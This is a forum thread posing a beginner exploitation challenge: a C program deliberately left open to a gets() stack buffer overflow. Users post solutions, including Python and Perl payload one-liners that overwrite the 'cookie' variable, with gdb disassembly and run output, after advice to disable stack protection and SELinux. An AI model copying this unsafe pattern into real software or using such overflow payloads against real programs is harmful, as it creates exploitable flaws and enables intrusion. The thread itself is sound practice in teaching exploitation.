Exploitation Challenge #1

[-0-]

Firstly, don't forget to disable protection. See here: http://www.cyberciti.biz/faq/what-is-rhel-centos-fedora-core-execshield/

If you have selinux you'll have to disable that as well.

Later challenges will have all of the protection enabled, but for now we will disable them.


The first challenge is up here.

#include <stdio.h>
 
int main() {
int cookie;
char buf[256];
 
printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);
 
if (cookie == 0x48474645)
printf("you win!\n");
 
return 0;
}

This challenge can be completed two ways:
1. From the command line.
2. Writing an exploit.

You can either PM me your solution, or add it to the thread with spoiler tags. This challenge will be different on everyone's machine, so my solution is almost certain not to work on yours. When submitting the solution, please provide the following:
1. Arch (i.e x86-64)
2. Command line output if you used the command line to solve this.
3. 'disas main' output so I can verify your solution based on your stack contents.
4. Distro (flavour of linux, BSD, etc).

If you have any questions let me know. Best of luck!

h57xiucj2z946q

Not sure if I done this the correct way, but I only have a Windows machine in front of me at the minute. Will try it on a linux machine later tonight.

Arch: x86
OS: Windows Vista Sp2
Compiled with Code::Blocks/MinGW (default configuration, no protection enabled or disabled by me)

C:\Program Files\CodeBlocks\MinGW\bin>gdb -q c:\challenges\ch1\bin\Debug\ch1.exe
(gdb) disass main
Dump of assembler code for function main:
0x00401318 <main+0>: push %ebp
0x00401319 <main+1>: mov %esp,%ebp
0x0040131b <main+3>: and $0xfffffff0,%esp
0x0040131e <main+6>: sub $0x120,%esp
0x00401324 <main+12>: call 0x401770 <__main>
0x00401329 <main+17>: lea 0x11c(%esp),%eax
0x00401330 <main+24>: mov %eax,0x8(%esp)
0x00401334 <main+28>: lea 0x1c(%esp),%eax
0x00401338 <main+32>: mov %eax,0x4(%esp)
0x0040133c <main+36>: movl $0x403024,(%esp)
0x00401343 <main+43>: call 0x4019ac <printf>
0x00401348 <main+48>: lea 0x1c(%esp),%eax
0x0040134c <main+52>: mov %eax,(%esp)
0x0040134f <main+55>: call 0x4019b4 <gets>
0x00401354 <main+60>: mov 0x11c(%esp),%eax
0x0040135b <main+67>: cmp $0x48474645,%eax
0x00401360 <main+72>: jne 0x40136e <main+86>
0x00401362 <main+74>: movl $0x40303c,(%esp)
0x00401369 <main+81>: call 0x4019bc <puts>
0x0040136e <main+86>: mov $0x0,%eax
0x00401373 <main+91>: leave
0x00401374 <main+92>: ret
End of assembler dump.
(gdb) run
Starting program: c:\challenges\ch1\bin\Debug\ch1.exe
[New thread 3908.0x22bc]
buf: 0022fe1c cookie: 0022ff1c
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEFGH
you win!

Program exited normally.
(gdb)

note: tried this on Solaris (x86-64, not SPARC) but seems Im missing something.

[-0-]

Good man Damo. Looks great!

I won't give you any hints regarding Solaris just yet. Looking forward to seeing your Linux solution as well.

Hall of Fame:

• Damo2k (Windows vista sp2 - x86)

pacquiao

I really enjoyed this challenge

windows 7 - 32bit
python
gdb

import subprocess

junk = "A" * 256
secret = "EFGH"
cmd = "buff"
p = subprocess.Popen(cmd,shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
)
p.stdin.write(junk+secret)

output = p.communicate()[0]
print output



(gdb) disass main
Dump of assembler code for function main:
0x00401318 <main+0>: push %ebp
0x00401319 <main+1>: mov %esp,%ebp
0x0040131b <main+3>: and $0xfffffff0,%esp
0x0040131e <main+6>: sub $0x120,%esp
0x00401324 <main+12>: call 0x401770 <__main>
0x00401329 <main+17>: lea 0x11c(%esp),%eax
0x00401330 <main+24>: mov %eax,0x8(%esp)
0x00401334 <main+28>: lea 0x1c(%esp),%eax
0x00401338 <main+32>: mov %eax,0x4(%esp)
0x0040133c <main+36>: movl $0x403024,(%esp)
0x00401343 <main+43>: call 0x4019ac <printf>
0x00401348 <main+48>: lea 0x1c(%esp),%eax
0x0040134c <main+52>: mov %eax,(%esp)
0x0040134f <main+55>: call 0x4019b4 <gets>
0x00401354 <main+60>: mov 0x11c(%esp),%eax
0x0040135b <main+67>: cmp $0x48474645,%eax
0x00401360 <main+72>: jne 0x40136e <main+86>
0x00401362 <main+74>: movl $0x40303c,(%esp)
0x00401369 <main+81>: call 0x4019bc <puts>
0x0040136e <main+86>: mov $0x0,%eax
0x00401373 <main+91>: leave
0x00401374 <main+92>: ret
0x00401375 <main+93>: nop
0x00401376 <main+94>: nop
0x00401377 <main+95>: nop
0x00401378 <main+96>: add %al,(%eax)
0x0040137a <main+98>: add %al,(%eax)
0x0040137c <main+100>: add %al,(%eax)
0x0040137e <main+102>: add %al,(%eax)
End of assembler dump.
(gdb)

h57xiucj2z946q

Linux damo-XPS-M1530 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 17:34:21 UTC 2012 i686 i686 i386 GNU/Linux

Only thing I disabled was stack smashing protection
damo@damo-XPS-M1530 ~/ch1 $ gcc ch1.c -fno-stack-protector -o ch1

damo@damo-XPS-M1530 ~/ch1 $ mkfifo pipe
damo@damo-XPS-M1530 ~/ch1 $ python -c 'print "A"*256 + "\x45\x46\x47\x48"' > pipe &
[1] 6096
damo@damo-XPS-M1530 ~/ch1 $
damo@damo-XPS-M1530 ~/ch1 $ gdb -q ch1
Reading symbols from /home/damo/ch1/ch1...(no debugging symbols found)...done.
(gdb) disass main
Dump of assembler code for function main:
0x08048434 <+0>: push %ebp
0x08048435 <+1>: mov %esp,%ebp
0x08048437 <+3>: and $0xfffffff0,%esp
0x0804843a <+6>: sub $0x120,%esp
0x08048440 <+12>: mov $0x8048560,%eax
0x08048445 <+17>: lea 0x11c(%esp),%edx
0x0804844c <+24>: mov %edx,0x8(%esp)
0x08048450 <+28>: lea 0x1c(%esp),%edx
0x08048454 <+32>: mov %edx,0x4(%esp)
0x08048458 <+36>: mov %eax,(%esp)
0x0804845b <+39>: call 0x8048330 <printf@plt>
0x08048460 <+44>: lea 0x1c(%esp),%eax
0x08048464 <+48>: mov %eax,(%esp)
0x08048467 <+51>: call 0x8048340 <gets@plt>
0x0804846c <+56>: mov 0x11c(%esp),%eax
0x08048473 <+63>: cmp $0x48474645,%eax
0x08048478 <+68>: jne 0x8048486 <main+82>
0x0804847a <+70>: movl $0x8048578,(%esp)
0x08048481 <+77>: call 0x8048350 <puts@plt>
0x08048486 <+82>: mov $0x0,%eax
0x0804848b <+87>: leave
0x0804848c <+88>: ret
End of assembler dump.
(gdb) b *0x08048473
Breakpoint 1 at 0x8048473
(gdb) r < pipe
Starting program: /home/damo/ch1/ch1 < pipe
buf: bffff73c cookie: bffff83c

Breakpoint 1, 0x08048473 in main ()
(gdb) i r
eax 0x48474645 1212630597
ecx 0x2ac3a4 2802596
edx 0xbffff73c -1073744068
ebx 0x2aaff4 2797556
esp 0xbffff720 0xbffff720
ebp 0xbffff848 0xbffff848
esi 0x0 0
edi 0x0 0
eip 0x8048473 0x8048473 <main+63>
eflags 0x282 [ SF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) si
0x08048478 in main ()
(gdb) disass main
Dump of assembler code for function main:
0x08048434 <+0>: push %ebp
0x08048435 <+1>: mov %esp,%ebp
0x08048437 <+3>: and $0xfffffff0,%esp
0x0804843a <+6>: sub $0x120,%esp
0x08048440 <+12>: mov $0x8048560,%eax
0x08048445 <+17>: lea 0x11c(%esp),%edx
0x0804844c <+24>: mov %edx,0x8(%esp)
0x08048450 <+28>: lea 0x1c(%esp),%edx
0x08048454 <+32>: mov %edx,0x4(%esp)
0x08048458 <+36>: mov %eax,(%esp)
0x0804845b <+39>: call 0x8048330 <printf@plt>
0x08048460 <+44>: lea 0x1c(%esp),%eax
0x08048464 <+48>: mov %eax,(%esp)
0x08048467 <+51>: call 0x8048340 <gets@plt>
0x0804846c <+56>: mov 0x11c(%esp),%eax
0x08048473 <+63>: cmp $0x48474645,%eax
=> 0x08048478 <+68>: jne 0x8048486 <main+82>
0x0804847a <+70>: movl $0x8048578,(%esp)
0x08048481 <+77>: call 0x8048350 <puts@plt>
0x08048486 <+82>: mov $0x0,%eax
0x0804848b <+87>: leave
0x0804848c <+88>: ret
End of assembler dump.
(gdb) si
0x0804847a in main ()
(gdb) disass main
Dump of assembler code for function main:
0x08048434 <+0>: push %ebp
0x08048435 <+1>: mov %esp,%ebp
0x08048437 <+3>: and $0xfffffff0,%esp
0x0804843a <+6>: sub $0x120,%esp
0x08048440 <+12>: mov $0x8048560,%eax
0x08048445 <+17>: lea 0x11c(%esp),%edx
0x0804844c <+24>: mov %edx,0x8(%esp)
0x08048450 <+28>: lea 0x1c(%esp),%edx
0x08048454 <+32>: mov %edx,0x4(%esp)
0x08048458 <+36>: mov %eax,(%esp)
0x0804845b <+39>: call 0x8048330 <printf@plt>
0x08048460 <+44>: lea 0x1c(%esp),%eax
0x08048464 <+48>: mov %eax,(%esp)
0x08048467 <+51>: call 0x8048340 <gets@plt>
0x0804846c <+56>: mov 0x11c(%esp),%eax
0x08048473 <+63>: cmp $0x48474645,%eax
0x08048478 <+68>: jne 0x8048486 <main+82>
=> 0x0804847a <+70>: movl $0x8048578,(%esp)
0x08048481 <+77>: call 0x8048350 <puts@plt>
0x08048486 <+82>: mov $0x0,%eax
0x0804848b <+87>: leave
0x0804848c <+88>: ret
End of assembler dump.
(gdb) c
Continuing.
you win!
[Inferior 1 (process 6021) exited normally]
(gdb) q

[-0-]

Nicely done gents.

I'll stick up challenge #2 when a couple more get this one. It's sort of based on this one so getting this is necessary.

Hall of Fame:

• Damo2k (Windows vista sp2 - x86, Linux i686/i386)
• pacquiao (windows 7 - 32 bit)

[-0-]

Are people having issues with this? Need any hints?

schrodinger

[-0-] wrote: »

Are people having issues with this? Need any hints?

Just lazy Thanks for the challenge.

schrodinger@sapientia:~/prog/c$ uname -a
Linux sapientia 2.6.39-bpo.2-amd64 #1 SMP Tue Jul 26 10:35:23 UTC 2011 x86_64 GNU/Linux
schrodinger@sapientia:~/prog/c$ perl -e 'print "A"x268 . pack("L",0x48474645);' > input && gdb cookie
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/schrodinger/prog/c/cookie...(no debugging symbols found)...done.
(gdb) r < input
Starting program: /home/schrodinger/prog/c/cookie < input
buf: ffffd570 cookie: ffffd67c
you win!

Program exited normally.
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400584 <main+0>: push rbp
0x0000000000400585 <main+1>: mov rbp,rsp
0x0000000000400588 <main+4>: sub rsp,0x110
0x000000000040058f <main+11>: mov eax,0x4006cc
0x0000000000400594 <main+16>: lea rdx,[rbp-0x4]
0x0000000000400598 <main+20>: lea rcx,[rbp-0x110]
0x000000000040059f <main+27>: mov rsi,rcx
0x00000000004005a2 <main+30>: mov rdi,rax
0x00000000004005a5 <main+33>: mov eax,0x0
0x00000000004005aa <main+38>: call 0x400458 <printf@plt>
0x00000000004005af <main+43>: lea rax,[rbp-0x110]
0x00000000004005b6 <main+50>: mov rdi,rax
0x00000000004005b9 <main+53>: call 0x400488 <gets@plt>
0x00000000004005be <main+58>: mov eax,DWORD PTR [rbp-0x4]
0x00000000004005c1 <main+61>: cmp eax,0x48474645
0x00000000004005c6 <main+66>: jne 0x4005d2 <main+78>
0x00000000004005c8 <main+68>: mov edi,0x4006e4
0x00000000004005cd <main+73>: call 0x400468 <puts@plt>
0x00000000004005d2 <main+78>: mov eax,0x0
0x00000000004005d7 <main+83>: leave
0x00000000004005d8 <main+84>: ret
End of assembler dump.
(gdb) quit
schrodinger@sapientia:~/prog/c$

h57xiucj2z946q

More!

[-0-]

I'll throw up another one over the weekend. I'm in the process of apartment hunting and also traveling around the states for the next couple of weeks but I have some free time this Sunday.

h57xiucj2z946q

Nice one.

I'm just back from the states. Was there for a few weeks.

[-0-]

Nadia Shrilling Elf wrote: »

Nice one.

I'm just back from the states. Was there for a few weeks.

Where were ya Damo? Did you like it?

h57xiucj2z946q

[-0-] wrote: »

Where were ya Damo? Did you like it?

Arizona, California and Nevada. The other half's family is from Phoenix, AZ so we went over for a visit.